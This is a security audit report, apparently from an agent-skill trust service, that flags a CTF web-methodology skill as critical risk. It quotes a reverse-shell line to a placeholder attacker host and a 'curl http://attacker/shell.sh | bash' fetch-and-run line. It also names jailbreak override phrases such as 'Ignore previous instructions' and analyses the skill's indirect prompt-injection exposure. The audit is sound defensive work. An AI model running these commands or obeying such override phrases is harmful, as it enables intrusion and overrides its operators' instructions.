Skills
skills/wgpsec/aboutsecurity/ctf-web-methodology/Gen Agent Trust Hub

ctf-web-methodology

Fail

Audited by Gen Agent Trust Hub on Apr 22, 2026

Risk Level: CRITICALPROMPT_INJECTIONREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONEXTERNAL_DOWNLOADS
Full Analysis
  • [PROMPT_INJECTION]: The skill contains extensive documentation and examples of AI jailbreak techniques, including prompts to override system instructions, disable personas, and extract system prompts (found in references/auth-and-access.md and references/field-notes.md). These patterns, such as 'Ignore previous instructions' and 'System Override', pose a risk to the agent's own stability and safety filters if not handled in a strictly sandboxed context.
  • [REMOTE_CODE_EXECUTION]: Multiple files contain functional code and payloads for achieving remote code execution. Notably, references/server-side-advanced-2.md contains a complete Python script for a 'Rogue MySQL Server' designed to steal files via the LOAD DATA LOCAL protocol, which was flagged as a Trojan by antivirus scanners. Other files provide payloads for Java and Python deserialization vulnerabilities.
  • [COMMAND_EXECUTION]: The skill provides numerous payloads for shell command execution across different platforms and languages. references/server-side-deser.md and references/field-notes.md include active reverse shell patterns (e.g., bash -i >& /dev/tcp/ATTACKER/4444 0>&1) designed to grant remote access to an attacker.
  • [DATA_EXFILTRATION]: The methodology describes several techniques for exfiltrating sensitive data to external domains such as webhook.site and attacker.com via HTTP requests, DNS queries, and custom response headers (found in references/server-side-exec.md, references/auth-and-access.md, and references/flag-extraction.md).
  • [EXTERNAL_DOWNLOADS]: The skill includes instructions for downloading and executing remote scripts (e.g., curl http://attacker/shell.sh | bash in references/server-side-exec.md), which is a high-risk pattern for arbitrary code execution.
  • [INDIRECT_PROMPT_INJECTION]: The skill creates a high-risk surface for indirect prompt injection.
  • Ingestion points: The agent is instructed to use tools like http_request to fetch and analyze HTML, source code, and API responses from target websites (SKILL.md).
  • Capability inventory: The skill provides the agent with a vast array of powerful attack capabilities (RCE, file reading, network exfiltration).
  • Boundary markers: There are no instructions or delimiters provided to separate target-provided content from the agent's internal instructions.
  • Sanitization: There is no mention of sanitizing or validating external content before the agent uses it to make decisions or formulate new commands.
Recommendations
  • CRITICAL: 1 infected file(s) detected - DO NOT USE
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 22, 2026, 07:58 AM